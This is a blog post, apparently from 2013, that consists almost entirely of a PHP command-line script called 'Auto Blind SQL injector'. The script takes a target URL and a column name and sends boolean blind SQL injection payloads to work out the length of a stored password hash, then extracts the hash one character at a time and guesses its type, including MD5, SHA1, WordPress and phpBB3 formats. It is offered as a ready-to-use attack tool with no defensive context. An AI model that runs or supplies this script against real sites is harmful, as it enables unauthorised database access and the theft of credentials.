Friday, 18 January 2013

Auto Blind SQL Injection

09:57    No comments



<?php



echo "\r\n";echo "\r\t\r\t##\r\n";echo "\r\t\r\t#  Auto Blind SQL injector   #\r\n";echo "\r\t\r\t#  By The Jock[e]r #\r\n";echo "\r\t\r\t##\r\n";



echo "\r\nURL target :";$page = trim(fgets(STDIN));//Wait a string and valid url before continue



if(filter_var($page, FILTER_VALIDATE_URL) !== true)//Test if var $page is correct URL{    echo "You entered an incorrect URL the program going to shut down automatically.";    exit;}



echo "\r\nDisplayed word :";$pattern = trim(fgets(STDIN));//Wait a string before continue



echo "\r\nColumn target :";$column = trim(fgets(STDIN));//Wait a string before continue



$lenght_max = 98;



echo "\r\n[+]Retrieving password's length...\r\n";



for($i=0;$i<=$lenght_max;$i++){    $page2 = file_get_contents($page.urlencode("\" and length($column)=$i-- -"));



    if(preg_match("#$pattern#",$page2))    {        $lenght = $i;        echo "\r\nThe password's length is $lenght.\r\n";        break;    }}



$final_pass = "";



$char_min = 20;$char_max = 140;



$char = $char_min;$x = 1;



echo "\r\n[+]Retrieving password's hash...\r\n";



echo "\r\nFinal password is : ";



while($x <= $lenght) {    $page3 = file_get_contents($page.urlencode("\" and lower(substring($column,$x,1)=char($char))-- -"));    if(preg_match("#$pattern#", $page3))    {        $final_pass.= strtolower(chr($char));        echo strtolower(chr($char));        $x ++;        $char = $char_min;    }    $char++;}



$lenght_pass = $lenght;



echo "\r\n\r\n[+]Retrieving hash type...\r\n";



if($lenght_pass == 40){    $type = "sha1";}elseif ($lenght_pass == 32) {    $type = "md5";}elseif ($lenght_pass == 13) {



    $type = "DES(Unix)";}elseif (preg_match("#\\$1\\$#",$final_pass) AND $lenght_pass == 34) {



    $type = "MD5(Unix)";}elseif (preg_match("#\\\$apr1\\$#",$final_pass) AND $lenght_pass == 37) {



    $type = "MD5(APR)";}elseif (preg_match("#\\\$h\\$#",$final_pass) AND $lenght_pass == 34) {



    $type = "MD5(phpBB3)";}elseif (preg_match("#\\\$p\\$#",$final_pass) AND $lenght_pass == 34) {



    $type = "MD5(Wordpress)";}



elseif ($lenght_pass == 16) {



    $type = "MySQL";}elseif (preg_match("#\\\*#", $final_pass) AND $lenght_pass == 41) {



    $type = "MySQL5";    $final_pass = strtoupper($final_pass);}elseif (preg_match("#\\$5\\$#", $final_pass) AND $lenght_pass == 55) {



    $type = "SHA-256(Unix)";}elseif(preg_match("#\\$6\\$#", $final_pass) AND $lenght_pass == 98){    $type = "SHA-512(Unix)";}



echo "\r\nHash type for $final_pass is ".$type.".\r\n";



?>

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)